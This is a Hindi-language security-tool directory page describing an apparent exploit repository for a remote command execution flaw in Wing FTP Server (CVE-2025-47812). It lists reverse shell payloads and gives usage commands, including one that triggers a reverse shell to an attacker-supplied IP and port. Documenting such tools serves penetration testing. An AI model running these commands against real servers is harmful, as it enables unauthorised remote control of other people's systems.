Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

विंग FTP सर्वर (CVE-2025-47812) के लिए रिमोट कमांड निष्पादन एक्सप्लॉइट

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47812 - Wing FTP Server RCE एक्सप्लॉइट

यह रिपॉज़िटरी CVE-2025-47812 के लिए एक proof-of-concept एक्सप्लॉइट प्रदान करती है, जो Wing FTP Server में एक रिमोट कमांड एक्ज़ीक्यूशन (RCE) भेद्यता है। एक हमलावर प्रमाणीकरण के दौरान username पैरामीटर का दुरुपयोग करके मनमाना Lua-आधारित सिस्टम कमांड इंजेक्ट और निष्पादित कर सकता है, जिसके परिणामस्वरूप पूर्ण रिमोट कोड एक्ज़ीक्यूशन होता है।


📌 एक्सप्लॉइट विशेषताएँ

  • 🔧 कस्टम शेल कमांड का रिमोट निष्पादन
  • 🧬 कई अंतर्निहित रिवर्स शेल पेलोड (bash, Python, netcat, आदि)
  • 🪪 Set-Cookie से स्वचालित UID निष्कर्षण
  • 📦 सफल UID को found_uids.txt में लॉग करता है
  • 🧪 ड्राई-रन मोड (कोई वास्तविक अनुरोध नहीं भेजा जाता — अपने इनपुट/आउटपुट लॉजिक का सुरक्षित रूप से परीक्षण करें)
  • 🔁 नेटवर्क विफलता पर रीट्राई लॉजिक
  • 🧹 साफ-सुथरा पेलोड फ़ॉर्मेटिंग और पठनीय आउटपुट
  • ✅ IP, पोर्ट और URL के लिए इनपुट सत्यापन
  • ⚙️ स्वचालित वर्कफ़्लो के लिए कमांड-लाइन आर्गुमेंट समर्थन

💻 उपयोग

एक साधारण शेल कमांड निष्पादित करें:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

रिवर्स शेल ट्रिगर करें:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

ड्राई-रन मोड (कोई अनुरोध नहीं भेजा जाएगा):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 मूल एक्सप्लॉइट में किए गए बदलाव

Feature/ImprovementDescription
✅ आर्गुमेंट पार्सिंगगैर-इंटरैक्टिव मोड के लिए argparse CLI समर्थन जोड़ा गया
🔐 इनपुट सत्यापनएक्सप्लॉइट प्रयास से पहले मान्य URL/IP/पोर्ट सुनिश्चित करता है
📦 हेडर रीफ़ैक्टरिंगस्थिरता के लिए HTTP हेडर को पुन: प्रयोज्य फ़ंक्शन में निकाला गया
📄 UID लॉगिंगसफल UID टोकन को found_uids.txt में सहेजता है
🧪 ड्राई-रन मोडअनुरोध भेजे बिना सुरक्षित परीक्षण की अनुमति देता है (--dry-run)
🕒 टाइमआउट + रीट्राईअनुरोध टाइमआउट और विफलता पर स्वचालित रीट्राई प्रयास जोड़ता है
🧼 पेलोड पठनीयतास्पष्टता और रखरखाव के लिए Lua इंजेक्शन स्ट्रिंग को पुनः प्रारूपित किया गया
📊 संरचित आउटपुटआसान पढ़ने के लिए सर्वर प्रतिक्रियाओं और पेलोड जानकारी को डिलीमीटर के साथ लपेटा गया
⚠️ स्टेटस कोड जाँचलक्ष्य अप्रत्याशित HTTP स्टेटस कोड लौटाता है तो उपयोगकर्ता को चेतावनी देता है
📝 लॉगिंग सिस्टमबेहतर वर्बोसिटी नियंत्रण के लिए print() को Python logging मॉड्यूल से बदलता है

⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
इस टूल का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।



टूल डाउनलोड करें